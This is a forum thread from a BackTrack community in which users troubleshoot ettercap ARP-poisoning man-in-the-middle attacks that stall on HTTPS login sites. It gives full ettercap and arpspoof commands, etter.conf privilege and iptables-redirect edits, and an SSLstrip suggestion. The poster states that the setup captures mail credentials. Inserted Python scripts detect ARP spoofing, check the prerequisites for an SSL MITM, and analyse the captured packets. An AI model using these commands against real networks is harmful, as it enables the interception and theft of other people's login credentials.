Hello fellow Backtrack Users
I have been holding myself back from asking this question for 7 days now. I apologize if this has already been addressed somewhere else; I have searched above and beyond and to no avail can I solve this issue.
The issue is as follows...
I am running Backtrack 4 on the acer aspire one 160GB version
Backtrack 4 is running from Kingston 8 GB USB with Persistent changes
I am using ettercap in terminal via command line
Whenever I execute the MiTM ARP poisoning and try to visit a site that requires a login, such as gmail.com, youtube.com, hotmail.com etc...
The browser (IE and Firefox) hangs/lags/never loads the page; the status bar shows the page loading, but it never actually loads (Vista and XP SP1, SP2, SP3).
__________________________________________________ _______________
I have uncommented (#) the iptables lines in the etter.conf file
I have tried "echo 1 > /proc/sys/net/ipv4/ip_forward"
and "echo "1" > /proc/sys/net/ipv4/ip_forward"
I have tried
"ettercap -i ath0 -Tq -M arp:remote // -p autoadd"
"ettercap -i ath0 -Tq -M arp:remote // // -p autoadd"
"ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ // -p autoadd"
"ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ /192.168.1.100/ -p autoadd"
I have also tried
"ettercap -i ath0 -Tq -M ARP // -p autoadd"
"ettercap -i ath0 -Tq -M ARP // // -p autoadd"
"ettercap -i ath0 -Tq -M ARP /192.168.1.1/ // -p autoadd"
"ettercap -i ath0 -Tq -M ARP /192.168.1.1/ /192.168.1.100/ -p autoadd"
__________________________________________________ _______________
I also purchased a USB wireless key (TP-Link TL-WN321G, using the rt73 chipset), thinking it might have been my integrated card causing the problem.
It successfully captures credentials if I use Outlook and Windows Mail...
I can browse to all other sites, except those requiring a login (as stated above).
The issue seems to solve itself whenever it decides to (1 out of 20 tries).
Each try meaning resetting all PCs and unplugging and plugging in the router (Linksys WRT54G).
Driftnet successfully captures the pictures.
On my Windows machines the "arp -a" command in the command prompt gives the following result:
__________________________________________________ _______________
C:\Documents and Settings\Zeus>arp -a

Interface: 192.168.1.100 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-13-10-99-a9-e6     dynamic
  192.168.1.102         00-23-4e-2d-22-63     dynamic
  192.168.1.103         00-23-4e-2d-22-63     dynamic
  192.168.1.105         00-23-4e-2d-22-63     dynamic
__________________________________________________ _______________
When I would press "q" during the ARP poisoning attack to stop the attack,
I used to receive the following error:
"iptables v1.4.0: can't initialize iptables 'nat': Permission denied (you must be root). Perhaps iptables or your kernel needs to be upgraded"
I "solved" this by editing the [privs] section in the etter.conf file:
ec_uid = 0
__________________________________________________ ______________
On the rare occasion that the MiTM ARP poisoning worked, when I pressed "q" to quit I would receive this error anyway:
"iptables v1.4.0: can't initialize iptables 'nat': Permission denied (you must be root). Perhaps iptables or your kernel needs to be upgraded"
This was before editing the [privs] section in the etter.conf file:
ec_uid = 0
__________________________________________________ ______________
I am having a very hard time analysing the source of this problem
(the browser (IE and Firefox) hangs/lags/never loads the page; the status bar shows the page loading, but it never actually loads (Vista and XP SP1, SP2, SP3))
because of the inconsistencies; nothing seems to cause it to work, or not to work...
If anyone has experienced this, please post your success/failure/workaround/solution/concern.
__________________________________________________ ______________
Off subject: this being my first post, I would like to thank all those who participate in this forum. I have been using this forum for over a year now and have never had to ask a question because of the excellent support... Thank you for all the great documentation/support/tutorials.
Keep Up The Good Work Everyone
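The arp -a listing quoted in the post above shows three addresses (.102, .103, .105) resolving to the same physical address, which is what an ARP poisoning host looks like from the victim's side. As an added example that is not part of the original post or of ettercap, here is a small Python check that parses a Windows arp -a listing, reports any MAC that claims more than one IP, and compares two snapshots to catch the gateway's MAC changing. Both tables are constructed: the first repeats the addresses from the post, the second is a hypothetical state where the gateway entry itself has been poisoned; all function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the Windows `arp -a` output quoted above
# (same addresses as the post).
ARP_BEFORE = """\
Interface: 192.168.1.100 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-13-10-99-a9-e6     dynamic
  192.168.1.102         00-23-4e-2d-22-63     dynamic
  192.168.1.103         00-23-4e-2d-22-63     dynamic
  192.168.1.105         00-23-4e-2d-22-63     dynamic
"""

# Constructed, hypothetical second snapshot: the gateway now answers from the
# same MAC as the other spoofed entries.
ARP_POISONED = """\
Interface: 192.168.1.100 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-23-4e-2d-22-63     dynamic
  192.168.1.102         00-23-4e-2d-22-63     dynamic
"""

# One table row: IPv4 address, MAC (Windows uses '-', Linux ':'), entry type.
_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+(\S+)",
    re.MULTILINE,
)


def parse_arp_table(text):
    """Return {ip: (mac, type)} with MACs normalised to lower-case, '-' separated."""
    table = {}
    for ip, mac, kind in _ROW.findall(text):
        table[ip] = (mac.lower().replace(":", "-"), kind.lower())
    return table


def macs_claiming_multiple_ips(table):
    """MACs that answer for more than one IP: the signature of a host spoofing
    its neighbours (or, legitimately, a router/VM host with several addresses,
    so treat the result as a lead, not a verdict)."""
    by_mac = defaultdict(list)
    for ip, (mac, _) in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_mac_changed(before, after, gateway_ip):
    """True when the gateway's MAC differs between two snapshots: someone else
    is now answering ARP for the gateway."""
    if gateway_ip not in before or gateway_ip not in after:
        return False
    return before[gateway_ip][0] != after[gateway_ip][0]


def report(before_text, after_text, gateway_ip="192.168.1.1"):
    """Human-readable findings for a pair of snapshots (baseline, current)."""
    before, after = parse_arp_table(before_text), parse_arp_table(after_text)
    findings = []
    for mac, ips in macs_claiming_multiple_ips(after).items():
        findings.append(f"{mac} claims {len(ips)} addresses: {', '.join(ips)}")
    if gateway_mac_changed(before, after, gateway_ip):
        findings.append(
            f"gateway {gateway_ip} moved from {before[gateway_ip][0]} "
            f"to {after[gateway_ip][0]}"
        )
    return findings


if __name__ == "__main__":
    # On a real host, feed it `arp -a` output captured before and after the
    # suspicious period instead of the constructed samples.
    for line in report(ARP_BEFORE, ARP_POISONED):
        print(line)
```

A shared MAC across several IPs is also what you see behind a legitimate router or a VM host, so the gateway-MAC comparison against a known-good baseline is the stronger of the two signals.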
hmm... possibly check for a "1" in /proc/sys/net/ipv4/ip_forward
dd if=/dev/swc666 of=/dev/wyze
It's the SSL on the pages that require a login. You need to set up ettercap for MITM SSL.
Edit etter.conf (use locate),
look for iptables under "Linux" and uncomment both lines.
ettercap -T -q -i whateverinterface -M arp:remote // //
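The reply above, together with the steps in the original post, comes down to three settings on the attacking box: ec_uid/ec_gid under [privs], the two Linux redir_command lines, and /proc/sys/net/ipv4/ip_forward. As an added example that is not part of this thread or of ettercap, this Python checker parses an etter.conf fragment and an ip_forward value and lists whichever of those is still wrong. The configuration text is constructed in the shape of the 0.7.3 etter.conf defaults, and the function names are my own.

```python
import re

# Constructed etter.conf fragment in the shape of the 0.7.3 defaults: privileges
# dropped to nobody, iptables redirect lines still commented out.
ETTER_CONF_DEFAULT = """\
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534

[redir_command]
# Linux
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
"""

# The same fragment after the edits described in this thread.
ETTER_CONF_FIXED = (
    ETTER_CONF_DEFAULT.replace("ec_uid = 65534", "ec_uid = 0")
    .replace("ec_gid = 65534", "ec_gid = 0")
    .replace("#redir_command_on", "redir_command_on")
    .replace("#redir_command_off", "redir_command_off")
)


def parse_etter_conf(text):
    """Minimal etter.conf parser: {section: {key: value}}. '#' comments are
    stripped and quoted values unquoted, so a commented-out key is simply absent."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments, including whole commented lines
        if not line:
            continue
        m = re.match(r"^\[(\w+)\]$", line)
        if m:
            section = m.group(1)
            conf.setdefault(section, {})
            continue
        if "=" in line and section is not None:
            key, value = (s.strip() for s in line.split("=", 1))
            conf[section][key] = value.strip('"')
    return conf


def check_mitm_prereqs(conf_text, ip_forward_value):
    """Return the list of settings that would stop an ettercap SSL MITM from
    working: privileges not kept at root (the 'you must be root' iptables error
    quoted in this thread), redirect commands commented out or not redirecting
    to the nat table, or kernel forwarding disabled."""
    conf = parse_etter_conf(conf_text)
    problems = []

    privs = conf.get("privs", {})
    if privs.get("ec_uid") != "0" or privs.get("ec_gid") != "0":
        problems.append("privs: ec_uid/ec_gid are not 0 (iptables 'you must be root' error)")

    redir = conf.get("redir_command", {})
    for key in ("redir_command_on", "redir_command_off"):
        cmd = redir.get(key)
        if cmd is None:
            problems.append(f"redir_command: {key} is missing or commented out")
        elif "-t nat" not in cmd or "REDIRECT" not in cmd or "%rport" not in cmd:
            problems.append(f"redir_command: {key} does not REDIRECT %port to %rport in the nat table")

    if ip_forward_value.strip() != "1":
        problems.append("/proc/sys/net/ipv4/ip_forward is not 1, victims' traffic will not be forwarded")
    return problems


if __name__ == "__main__":
    # On the attacking host you would pass open('/etc/etter.conf').read() and
    # open('/proc/sys/net/ipv4/ip_forward').read() instead of the constructed samples.
    for p in check_mitm_prereqs(ETTER_CONF_DEFAULT, "0\n"):
        print("FAIL:", p)
    print("fixed config:", check_mitm_prereqs(ETTER_CONF_FIXED, "1\n") or "ok")
```

Running it against the live files before starting ettercap turns the trial-and-error described in this thread into a yes/no answer for each prerequisite; it does not, by itself, prove the redirect rule was actually inserted, which `iptables -t nat -L PREROUTING -n` on the attacking host shows.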
I have the same problem with ettercap in -M arp:remote mode, despite echo 1 > /proc/sys/net/ipv4/ip_forward and configuring etter.conf for ec_uid and ec_gid = 0, and redir_command for iptables.
I mean everything goes well with HTTP, but traffic is blocked when the "test machine" requests HTTPS for iGoogle or Facebook. Captures with Wireshark show the "test machine" TCP requests for HTTPS but no answers (see below).
Did you fix this?
Suse 11.1
ettercap NG-0.7.3
Wireshark captures during HTTPS requests from the "test machine" (192.168.1.101):
No.   Source         Destination    Protocol  Info
673   192.168.1.101  74.125.65.147  TCP       ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
696   192.168.1.101  74.125.65.147  TCP       ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
735   192.168.1.101  74.125.65.147  TCP       ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
820   192.168.1.101  74.125.65.99   TCP       stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
843   192.168.1.101  74.125.65.99   TCP       stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
878   192.168.1.101  74.125.65.99   TCP       stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
950   192.168.1.101  74.125.65.103  TCP       twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
969   192.168.1.101  74.125.65.103  TCP       twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1000  192.168.1.101  74.125.65.103  TCP       twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1071  192.168.1.101  74.125.65.104  TCP       plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1072  192.168.1.101  74.125.67.102  TCP       nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
1073  192.168.1.101  74.125.65.100  TCP       genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
1074  192.168.1.101  74.125.67.102  TCP       nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
1075  192.168.1.101  74.125.65.100  TCP       genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
1092  192.168.1.101  74.125.65.104  TCP       plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1125  192.168.1.101  74.125.65.104  TCP       plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1188  192.168.1.101  74.125.65.147  TCP       cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1203  192.168.1.101  74.125.65.147  TCP       cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1236  192.168.1.101  74.125.65.147  TCP       cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
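The capture above has a clear shape: each HTTPS flow is the same source port sending SYN with Seq=0 three times (TCP retransmitting a SYN that got no SYN/ACK), while the HTTP lines are RST/ACKs whose Ack is non-zero, i.e. connections that had completed the handshake and exchanged data before the client tore them down. As an added example that is not from the poster or from Wireshark, this Python snippet parses summary lines in that format and separates the two patterns. The sample is constructed: it reuses frames from the post and adds two hypothetical frames (2000/2001) showing what a completed HTTPS handshake would look like, for contrast; the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the summary lines posted above, plus two
# constructed frames (2000/2001) that show a healthy HTTPS handshake.
CAPTURE = """\
673   192.168.1.101  74.125.65.147  TCP  ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
696   192.168.1.101  74.125.65.147  TCP  ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
735   192.168.1.101  74.125.65.147  TCP  ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
820   192.168.1.101  74.125.65.99   TCP  stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
843   192.168.1.101  74.125.65.99   TCP  stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
1072  192.168.1.101  74.125.67.102  TCP  nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
1073  192.168.1.101  74.125.65.100  TCP  genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
2000  192.168.1.101  74.125.65.104  TCP  plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
2001  74.125.65.104  192.168.1.101  TCP  https > plethora [SYN, ACK] Seq=0 Ack=1 Win=5720 Len=0 MSS=1430
"""

# "No. Source Destination Protocol sport > dport [FLAGS] key=value ..."
_LINE = re.compile(
    r"^\s*(?P<no>\d+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<proto>\S+)\s+"
    r"(?P<sport>\S+) > (?P<dport>\S+) \[(?P<flags>[^\]]*)\](?P<rest>.*)$"
)


def parse_summary(text):
    """Turn summary lines into dicts; flags become a set, Seq=/Ack=/... a dict."""
    pkts = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["no"] = int(d["no"])
        d["flags"] = {f.strip() for f in d["flags"].split(",")}
        d["fields"] = dict(re.findall(r"(\w+)=(\d+)", d["rest"]))
        pkts.append(d)
    return pkts


def flow_key(p):
    """Direction-independent key so client and server packets land in one flow."""
    return tuple(sorted([(p["src"], p["sport"]), (p["dst"], p["dport"])]))


def summarise_flows(pkts):
    flows = defaultdict(lambda: {"client": None, "server": None, "syns": 0,
                                 "synack": False, "reset_after_data": False})
    for p in pkts:
        f = flows[flow_key(p)]
        if p["flags"] == {"SYN"}:
            f["client"], f["server"] = (p["src"], p["sport"]), (p["dst"], p["dport"])
            f["syns"] += 1
        elif {"SYN", "ACK"} <= p["flags"]:
            f["synack"] = True
            f["client"], f["server"] = (p["dst"], p["dport"]), (p["src"], p["sport"])
        elif "RST" in p["flags"] and int(p["fields"].get("Ack", "0")) > 0:
            # A RST carrying Ack > 0 (relative numbering) means the handshake
            # completed and data flowed; this is a teardown, not a failed connect.
            f["reset_after_data"] = True
            f["client"], f["server"] = (p["src"], p["sport"]), (p["dst"], p["dport"])
    return flows


def unanswered_syn_flows(pkts, min_syns=2):
    """(server ip, server port, client port, syn count) for flows where the client
    retransmitted SYN and no SYN/ACK was ever seen: something in the path (the
    destination, or a MITM that is not forwarding) is silently dropping them."""
    out = []
    for f in summarise_flows(pkts).values():
        if f["syns"] >= min_syns and not f["synack"]:
            (_, cport), (sip, sport) = f["client"], f["server"]
            out.append((sip, sport, cport, f["syns"]))
    return sorted(out)


def established_then_reset(pkts):
    """(server ip, server port, client port) for flows that completed and exchanged
    data before the client reset them."""
    out = []
    for f in summarise_flows(pkts).values():
        if f["reset_after_data"]:
            (_, cport), (sip, sport) = f["client"], f["server"]
            out.append((sip, sport, cport))
    return sorted(out)


if __name__ == "__main__":
    pkts = parse_summary(CAPTURE)
    print("SYN retransmitted, never answered:", unanswered_syn_flows(pkts))
    print("handshake completed, then reset:  ", established_then_reset(pkts))
```

Seeing the retransmitted SYNs only on port 443 while port 80 flows complete points at whatever treats those two ports differently on the attacking host: the REDIRECT rule for 443 and the listener it redirects to.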
Ettercap is buggy when used in Windows, but it's never gone wrong for me in Linux.
Try using SSLStrip.
http://forums.remote-exploit.org/bac...ettercap+https
Does that help?
~ Have you, g0tmi1k? ~
Thanks to those who replied. I tried your suggestions and unfortunately I am still getting browser hangs... I also tried SSLstrip, but as soon as I execute the arpspoof command all the SSL sites hang... I really hope I or anyone else finds a solution to this and posts it here... Ettercap is wonderful, but when it doesn't work it's nothing more than what could have been, a hope and a dream...